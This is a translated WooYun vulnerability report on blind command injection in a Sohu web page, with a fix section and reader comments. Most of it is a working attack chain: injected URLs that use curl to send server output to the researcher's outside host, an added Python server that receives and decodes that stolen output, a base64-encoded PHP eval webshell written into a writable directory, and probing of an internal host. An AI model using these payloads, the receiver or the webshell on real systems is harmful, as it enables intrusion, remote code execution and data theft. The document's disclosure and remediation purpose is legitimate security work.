
Sohu site: implicit (blind) command injection to Getshell

ID: 191558
URL: http://www.wooyun.org/bug.php?action=view&id=191558
Status: vendor confirmed
Title: Sohu site: implicit (blind) command injection to Getshell
Type: command execution
Vendor: 搜狐 (Sohu)
White hat: lijiejie
Submitted: 2016-04-01 22:17:00
Published: 2016-05-17 00:20:00
Fix time: (not set)
Confirmed: 2016-04-02 00:00:00
Confirm spend: 1
Tags: (none)
Followers: 0
Bookmarks: 0
White-hat self-rating: Rank 14
Vendor rating: Rank 20

Summary
Implicit (blind) command injection on a Sohu site leading to a shell. The page never echoes command output (hence "implicit"), so this write-up covers the basic method of getting command output back through an HTTP request.
Details

Command injection point:

http://ldd.sohu.com/d/?c=c&r=$(curl http://www.lijiejie.com:52016/?hostname=`hostname`)


The r parameter is injected into a Linux shell command. The link above uses curl to send the server's hostname back to my web server; since the page itself shows nothing, the callback is the only feedback.

[image: sohu.brce.png]


From the callback (screenshot above) we can see that pwd = /var/www/ldd/d.

POC

Start a web server on my VPS (Python 2 syntax; on Python 3 the equivalent is python3 -m http.server 52016):

python -m SimpleHTTPServer 52016


Then hit the vulnerable site with:

http://ldd.sohu.com/d/?c=c&r=$(curl http://www.lijiejie.com:52016/?command=`command`)


curl carries the command output back to www.lijiejie.com:52016 as a query parameter. As I recall, early URL length limits were around 4096 bytes (Apache's default LimitRequestLine is 8190), which is roughly enough for our purposes. Some characters cannot appear in a query parameter without encoding, though, for example newlines (\n) and spaces, so the output must be encoded before it is appended; we use base64. But base64 output is itself line-wrapped (GNU base64 wraps at 76 columns; base64 -w 0 would turn that off), so the \n in the encoded result must also be replaced; I use my usual "^" for this. One more caveat: standard base64 contains "+" and "/", and a server-side query-string parser turns a bare "+" into a space, so either percent-encode it as %2B or put it back when decoding. It does not matter here, because SimpleHTTPServer logs the raw request line untouched. The link to run one command is:

http://ldd.sohu.com/d/?c=c&r=$(curl http://www.lijiejie.com:52016/?ls_command=`ls /var/www/ldd -l|base64|tr '\n' '^'`)


This runs ls /var/www/ldd -l and sends the result back; the web server receives:

220.181.19.102 - - [01/Apr/2016 21:29:48] "GET /?ls_command=dG90YWwgNDA0Ci1ydy1yLS1yLS0gMSByb290IGFwYWNoZSAgIDIwMDIgTm92ICA1ICAyMDA5IF9s^ZGRhZG1pbi5waHAKLXJ3LXItLXItLSAxIHJvb3QgYXBhY2hlICAgIDE3NSBOb3YgIDUgIDIwMDkg^YXV0aGNoZWNrLnBocAotcnctci0tci0tIDEgcm9vdCBhcGFjaGUgICAyNDYwIE5vdiAgNSAgMjAw^OSBhdXRoY29kZS5waHAKLXJ3LXItLXItLSAxIHJvb3Qgcm9vdCAgICAxNDI4NCBOb3YgMTEgMTY6^MDAgY29kZS5nYmsucGhwCi1ydy1yLS1yLS0gMSByb290IHJvb3QgICAgMTA3MDIgRmViIDEzICAy^MDE0IGNvZGUuaHRtbAotcnctci0tci0tIDEgcm9vdCByb290ICAgIDE1ODkyIEZlYiAyOSAxODoz^MiBjb2RlLnBocAotcnctci0tci0tIDEgcm9vdCByb290ICAgIDE1MDQwIEZlYiAyOSAxMjo0NSBj^b2RlX2Jhay5waHAKLXJ3LXItLXItLSAxIHJvb3Qgcm9vdCAgICAxNTMwNyBGZWIgMjkgMTc6Mzcg^Y29kZV9uZXcucGhwCmRyd3hyLXhyLXggMyByb290IHJvb3QgICAgIDQwOTYgTWFyIDMwIDE1OjA2^IGQKLXJ3LXItLXItLSAxIHJvb3QgYXBhY2hlICAgMTE5MyBEZWMgMjMgIDIwMTAgaGVscHNvaHUu^YmF0CmRyd3hyLXhyLXggMiByb290IHJvb3QgICAgIDQwOTYgTm92IDEzIDE0OjAzIGltYWdlcwps^cnd4cnd4cnd4IDEgcm9vdCByb290ICAgICAgICA4IEZlYiAyNCAgMjAxNCBpbmRleC5waHAgLT4g^Y29kZS5waHAKZHJ3eHIteHIteCAyIHJvb3Qgcm9vdCAgICAgNDA5NiBOb3YgMTMgMTM6NDcganMK^LXJ3LXItLXItLSAxIHJvb3QgYXBhY2hlICAxNDQ2NyBOb3YgIDUgIDIwMDkgay5waHAKLXJ3LXIt^LXItLSAxIHJvb3QgYXBhY2hlICAxNDkyMiBGZWIgMjEgIDIwMTQgbGRkLnBocAotcnctci0tci0t^IDEgcm9vdCBhcGFjaGUgMjM5ODE0IE5vdiAgNSAgMjAwOSBuby5qcGcKLXJ3LXItLXItLSAxIHJv^b3Qgcm9vdCAgICAgICAgMCBOb3YgMTEgMTI6NDEgbnVsbC5qcGcKLXJ3LXItLXItLSAxIHJvb3Qg^YXBhY2hlICAgICA3MSBOb3YgIDUgIDIwMDkgc3BlZWQucGhwCi1ydy1yLS1yLS0gMSByb290IGFw^YWNoZSAgICAgIDAgTm92ICA1ICAyMDA5IHNwZWVkLnR4dAotcnctci0tci0tIDEgcm9vdCByb290^ICAgICAyNDYwIEZlYiAyNiAgMjAxNCBzdHlsZS5jc3MKLXJ3LXItLXItLSAxIHJvb3QgYXBhY2hl^ICAgIDIzNCBOb3YgIDUgIDIwMDkgdXBsb2FkLnBocAotcnctci0tci0tIDEgcm9vdCBhcGFjaGUg^IDEzNjIyIE5vdiAgNSAgMjAwOSB6cHkucGhwCg==^ HTTP/1.1" 301 -


After turning "^" back into newlines and base64-decoding the ls_command parameter, we get:

total 404
-rw-r--r-- 1 root apache   2002 Nov  5  2009 _lddadmin.php
-rw-r--r-- 1 root apache    175 Nov  5  2009 authcheck.php
-rw-r--r-- 1 root apache   2460 Nov  5  2009 authcode.php
-rw-r--r-- 1 root root    14284 Nov 11 16:00 code.gbk.php
-rw-r--r-- 1 root root    10702 Feb 13  2014 code.html
-rw-r--r-- 1 root root    15892 Feb 29 18:32 code.php
-rw-r--r-- 1 root root    15040 Feb 29 12:45 code_bak.php
-rw-r--r-- 1 root root    15307 Feb 29 17:37 code_new.php
drwxr-xr-x 3 root root     4096 Mar 30 15:06 d
-rw-r--r-- 1 root apache   1193 Dec 23  2010 helpsohu.bat
drwxr-xr-x 2 root root     4096 Nov 13 14:03 images
lrwxrwxrwx 1 root root        8 Feb 24  2014 index.php -> code.php
drwxr-xr-x 2 root root     4096 Nov 13 13:47 js
-rw-r--r-- 1 root apache  14467 Nov  5  2009 k.php
-rw-r--r-- 1 root apache  14922 Feb 21  2014 ldd.php
-rw-r--r-- 1 root apache 239814 Nov  5  2009 no.jpg
-rw-r--r-- 1 root root        0 Nov 11 12:41 null.jpg
-rw-r--r-- 1 root apache     71 Nov  5  2009 speed.php
-rw-r--r-- 1 root apache      0 Nov  5  2009 speed.txt
-rw-r--r-- 1 root root     2460 Feb 26  2014 style.css
-rw-r--r-- 1 root apache    234 Nov  5  2009 upload.php
-rw-r--r-- 1 root apache  13622 Nov  5  2009 zpy.php
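The decode step above can be scripted, and the same code can stand in for SimpleHTTPServer so that output is decoded as it arrives. The Python below is an added example, not code from the original report: it reproduces the `base64 | tr '\n' '^'` encoding (GNU base64's 76-column wrapping), pulls the request line out of an access-log line of the shape SimpleHTTPServer prints, restores any "+" that query-string decoding turned into a space, and decodes every parameter. The embedded log line is constructed from the first two entries of the listing above; the handler class, the function names and the 52016 default port are mine.

```python
"""Receiver side of the curl/base64 exfiltration trick.
Added example, not part of the original report.

The injected command runs
    ls /var/www/ldd -l | base64 | tr '\n' '^'
and curls the result to the attacker's web server as a query parameter.
GNU base64 wraps at 76 columns, so the payload arrives as 76-char chunks
joined by '^'.  These helpers build such a payload from raw bytes and turn
an access-log line (python -m SimpleHTTPServer / http.server format) back
into the original command output.
"""
import base64
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qsl, urlsplit

SEP = "^"  # the author's newline stand-in; any non-base64 character works

# Constructed sample: the first two lines of the report's listing, encoded the
# way the injected command encodes them, in a SimpleHTTPServer-style log line.
SAMPLE_LOG_LINE = (
    '220.181.19.102 - - [01/Apr/2016 21:29:48] "GET /?ls_command='
    "dG90YWwgNDA0Ci1ydy1yLS1yLS0gMSByb290IGFwYWNoZSAgIDIwMDIgTm92ICA1ICAyMDA5IF9s"
    "^ZGRhZG1pbi5waHAK^"
    ' HTTP/1.1" 301 -'
)

REQUEST_LINE_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/')


def encode_for_url(data: bytes, sep: str = SEP) -> str:
    """Mimic `base64 | tr '\\n' '^'`: 76-column wrapping, newline -> sep."""
    return base64.encodebytes(data).decode("ascii").replace("\n", sep)


def decode_param(value: str, sep: str = SEP) -> bytes:
    """Undo the encoding.  `value` is the parameter as a query-string parser
    returns it: percent-decoded and with every '+' already turned into ' '."""
    # Base64 never contains spaces, so a space can only be a '+' that the
    # query-string rules decoded; put it back before decoding.
    b64 = value.replace(" ", "+").replace(sep, "\n")
    return base64.b64decode(b64)


def decode_log_line(line: str, sep: str = SEP) -> dict:
    """Decode every query parameter in one access-log line.
    Returns {parameter_name: decoded_bytes}."""
    m = REQUEST_LINE_RE.search(line)
    if m is None:
        raise ValueError("no request line in: %r" % line)
    query = urlsplit(m.group("target")).query
    return {name: decode_param(value, sep)
            for name, value in parse_qsl(query, keep_blank_values=True)}


class ExfilHandler(BaseHTTPRequestHandler):
    """Drop-in for SimpleHTTPServer that prints decoded output on arrival."""

    def do_GET(self):
        for name, value in parse_qsl(urlsplit(self.path).query,
                                     keep_blank_values=True):
            try:
                text = decode_param(value).decode("utf-8", "replace")
            except Exception as exc:  # bad padding, truncated URL, ...
                text = "<decode failed: %s> raw=%r" % (exc, value)
            print("[%s] %s:\n%s" % (self.client_address[0], name, text))
        self.send_response(200)
        self.end_headers()


def serve(port: int = 52016) -> None:
    """Listen like `python -m SimpleHTTPServer 52016`, but decode as you go."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()


if __name__ == "__main__":
    print(decode_log_line(SAMPLE_LOG_LINE)["ls_command"].decode(), end="")
    serve()
```

Run it in place of SimpleHTTPServer and the listing is printed already decoded; the "+" restoration is what keeps a payload such as a PHP webshell (whose base64 happens to contain "+") intact when a query-string parser sits in front of the decoder.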


I found a world-writable directory (under /var/www/ldd/d, as the path used below shows):

drwxrwxrwx 2 root root 4096 Nov 13 15:25 log


And wrote a webshell into it:

http://ldd.sohu.com/d/?c=c&r=$(echo "PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+Cgo=" |base64 -d >/var/www/ldd/d/log/x.php)


The base64 string decodes to a one-line eval shell, <?php @eval($_POST['pass']);?>, which runs whatever PHP is sent in the pass POST parameter. Note the "+" inside the encoded string: if the application decodes the query string with the usual rules, that "+" becomes a space and base64 -d will refuse the input, so percent-encode it as %2B (or choose a payload whose encoding contains no "+").


[image: sohu.webshell.png]


From the shell, the internal OA host oa.sohu-inc.com is reachable:

[/var/www/]$ ping -c1 10.2.176.87
PING 10.2.176.87 (10.2.176.87) 56(84) bytes of data.
64 bytes from 10.2.176.87: icmp_seq=1 ttl=124 time=1.49 ms
--- 10.2.176.87 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.497/1.497/1.497/0.000 ms

Fix

Filter the input. More precisely: do not let the r parameter reach a shell at all. Validate c and r against an allowlist of the values the application actually expects and pass them to the program as separate arguments rather than as a shell command string; where a shell string is unavoidable, wrap the value in escapeshellarg() so it is passed as one literal word. Also remove the world-writable log directory from the web root, or at least stop the web server from executing PHP out of it.
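To make the fix concrete, the following Python is an added example, not Sohu's code: the real program behind /d/?c=...&r=... is not in the report, so echo stands in for it, and the allowlist pattern for r is an assumption. It contrasts the vulnerable string-built shell command with the two remedies above: quoting the argument when a shell string is unavoidable, and the preferred allowlist-plus-argv form with no shell at all.

```python
"""Added example: the injection primitive behind /d/?c=...&r=... and its fix.
Not Sohu's code.  The real program the site runs is not in the report, so
`echo` stands in for it; the parameter names c and r are kept."""
import re
import shlex
import subprocess

# Assumption: c picks one of a few fixed sub-commands and r is a short token
# (a file or host name).  Replace with whatever the application really accepts.
ALLOWED_C = {"c": ["echo"]}
R_PATTERN = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def vulnerable(c: str, r: str) -> str:
    """The bug: r is pasted into a string that /bin/sh parses, so $(...),
    backticks, ';', '|' and '&' inside it are all honoured."""
    cmd = "echo " + r                      # c ignored to keep the stand-in small
    return subprocess.run(cmd, shell=True,
                          capture_output=True, text=True).stdout


def quoted(c: str, r: str) -> str:
    """If a shell string is unavoidable: shlex.quote() (escapeshellarg() in
    PHP) turns r into one literal word, so $(...) is printed, not run."""
    cmd = "echo " + shlex.quote(r)
    return subprocess.run(cmd, shell=True,
                          capture_output=True, text=True).stdout


def hardened(c: str, r: str) -> str:
    """Preferred fix: allowlist both parameters and never involve a shell;
    the argv list goes straight to execve, so there is nothing to inject into."""
    if c not in ALLOWED_C:
        raise ValueError("unknown command %r" % c)
    if not R_PATTERN.match(r):
        raise ValueError("rejected argument %r" % r)
    return subprocess.run(ALLOWED_C[c] + [r],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "$(id)"
    print("vulnerable:", vulnerable("c", payload), end="")
    print("quoted:    ", quoted("c", payload), end="")
    try:
        hardened("c", payload)
    except ValueError as exc:
        print("hardened:   ", exc)
```

The quoted form is the minimum that "filtering" has to mean: escaping characters one by one is how such fixes get bypassed, while a proper quoting primitive covers the whole shell grammar. The hardened form is still better, because the rejected payload never gets near a parser that could be tricked.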

Status history
2016-04-01: details sent to the vendor, awaiting handling
2016-04-02: vendor confirmed; details visible only to the vendor
2016-04-12: details opened to core white hats and relevant domain experts
2016-04-22: details opened to regular white hats
2016-05-02: details opened to intern white hats
2016-05-17: details made public
Vendor reply: Thanks for the support.
Vendor response: severity High, Rank 20, confirmed 2016-04-02 00:11
Comments (8)

田老板 (0 likes, 2016-04-02 17:02:00): Impressive.

lijiejie (0 likes, 2016-04-02 15:40:00): @xsser This looks like it was found with cloudeye, haha~ right?

开心一下1313 (0 likes, 2016-04-02 13:07:00): Sister Li (lijiejie) is really, really awesome.

xsser (0 likes, 2016-04-02 09:55:00): How did you find it?

坏男孩-A_A (0 likes, 2016-04-02 09:49:00): What does "implicit command injection" mean?

sysALong (0 likes, 2016-04-02 06:35:00): Awesome.

雅柏菲卡 (0 likes, 2016-04-01 22:40:00): Sister Li (lijiejie) has gone into bug-farming mode..... scary.

玄道 (0 likes, 2016-04-01 22:24:00): Cheat mode, beep beep, engaged.